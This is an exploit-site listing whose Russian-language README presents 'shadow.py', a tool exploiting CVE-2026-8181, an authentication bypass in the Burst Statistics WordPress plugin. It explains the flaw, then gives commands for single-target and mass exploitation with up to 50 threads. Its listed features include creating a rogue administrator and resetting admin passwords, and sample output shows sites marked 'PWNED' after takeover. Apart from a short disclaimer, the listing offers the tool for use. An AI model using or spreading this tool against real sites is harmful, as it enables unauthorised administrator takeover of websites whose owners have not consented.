Sploitus

Exploit for CVE-2026-8181

kitploit · 2026-08-31

Exploit Code

MARKDOWN132 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XSHADOW-HERE-CVE-2026-8181
# CVE-2026-8181

Burst Statistics | Обход аутентификации до захвата учётной записи администратора

### Описание :

Burst Statistics 3.4.0 - 3.4.1.1 - Обход аутентификации до захвата учётной записи администратора

Плагин Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) для WordPress уязвим к обходу аутентификации в версиях с 3.4.0 по 3.4.1.1. Это связано с некорректной обработкой возвращаемого значения в функции `is_mainwp_authenticated()` при проверке паролей приложений из заголовка Authorization. Функция вызывает `wp_authenticate_application_password(null, $username, $password)`, которая возвращает `null` (а не `WP_Error`), когда у целевого пользователя не настроены пароли приложений. Поскольку код проверяет только `is_wp_error()`, он переходит к вызову `wp_set_current_user()` — предоставляя атакующему полные привилегии администратора на весь запрос.

Обход срабатывает во время `plugins_loaded` (приоритет 9) через `has_admin_access()` в загрузчике плагина, то есть подмена пользователя происходит **до** того, как WordPress REST API обработает любой маршрут, — что позволяет получить доступ ко всем конечным точкам ядра WP (`/wp/v2/users`, `/wp/v2/users/me` и т. д.) от имени администратора.

Это позволяет неаутентифицированным атакующим, знающим имя пользователя администратора, выдать себя за этого администратора, указав любой случайный пароль Basic Authentication, что приводит к полному повышению привилегий и захвату учётной записи администратора.

# ИНФОРМАЦИЯ : **CVE-2026-8181**

~ **Оценка CVSS: 9.8 (Критический)**

~ **Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H**

~ **Затронутые версии: 3.4.0 - 3.4.1.1**

~ **Исправленная версия: 3.4.2**

  * Исследователь : **Chloe Chamberland - Wordfence**



### Использование :

**Одиночная цель :**

  * `python3 shadow.py -u https://target.com`



**Одиночная цель с известным именем пользователя :**

  * `python3 shadow.py -u https://target.com -U admin`



**Массовые цели :**

  * `python3 shadow.py -f targets.txt -t 20`



**Интерактивный режим :**

  * `python3 shadow.py`
  * введите имя файла с целями
  * введите количество потоков (макс. 1-50)
  * введите таймаут 5-30 с



### Возможности :

  * Многопоточность (массовое сканирование до 50 потоков)
  * Обход аутентификации через заголовок X-BURSTMAINWP + Basic Auth
  * Автоматическое определение WordPress
  * Определение версии Burst Statistics и проверка уязвимой версии
  * Проверка доступности маршрута (`/burst/v1/mainwp-auth`)
  * Перечисление пользователей (REST API + Author Archive + запасной вариант oEmbed)
  * Извлечение токена пароля приложения
  * Создание пользователя-администратора через WP REST API
  * Сброс пароля администратора (запасной вариант)
  * Проверка захвата через wp-login.php
  * Автоматический откат HTTP/HTTPS и повторные попытки
  * Тройной вывод (user.txt, token.txt, new-user-and-header.txt)



### Вывод :

root@kitploit:~
    
    
    ╔══════════════════════════════════════════════════════╗
    ║  🔥 CVE-2026-8181 Burst Statistics Auth Bypass       ║
    ║  👩‍💻 Friska & Shadow | Route Check | Full Fallback  ║
    ║  🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output        ║
    ╚══════════════════════════════════════════════════════╝
    
    [*] [HTTP] http://target.com
    [+] Burst Statistics version: 3.4.0
    [+] Burst mainwp-auth route alive!
    [*] Testing 2 user(s): admin, editor
    [*] Trying bypass on: admin (id=1)
    [+] BYPASS SUCCESS → admin (id=1, admin=True)
    [+] Application Password token extracted!
    [💀] USER CREATED: shadow / R4nd0mP@ss!
    [💀] TAKEOVER VERIFIED via wp-login.php!
    [💀] SUCCESS! http://target.com/wp-admin/
    
    

root@kitploit:~
    
    
    ⚡ MASS SCAN: 50 targets | 20 threads
    ────────────────────────────────────────────────────────────
    [💀] [1/50] http://target1.com → PWNED!
    [💀] [2/50] http://target2.com → PWNED!
    [☠️] [3/50] http://target3.com → DEAD
    [-] [4/50] http://target4.com → SECURED
    [!] [5/50] http://target5.com → PATCHED
    ────────────────────────────────────────────────────────────
    
    ╔══════════════════════════════════╗
    ║       📊 SCAN SUMMARY            ║
    ╠══════════════════════════════════╣
    ║ 💀 PWNED: 12                     ║
    ║ ☠️  DEAD: 8                      ║
    ║ 🔒 SECURED: 5                    ║
    ║ ⚠️  PATCHED: 15                  ║
    ║ ❌ FAILED: 10                    ║
    ╠══════════════════════════════════╣
    ║ Total: 50                        ║
    ╚══════════════════════════════════╝
    
    [+] 📁 user.txt | token.txt | new-user-and-header.txt
    
    

## Дисклеймер :

## Этот инструмент предназначен только для образовательных целей и тестирования безопасности.

Несанкционированное использование систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.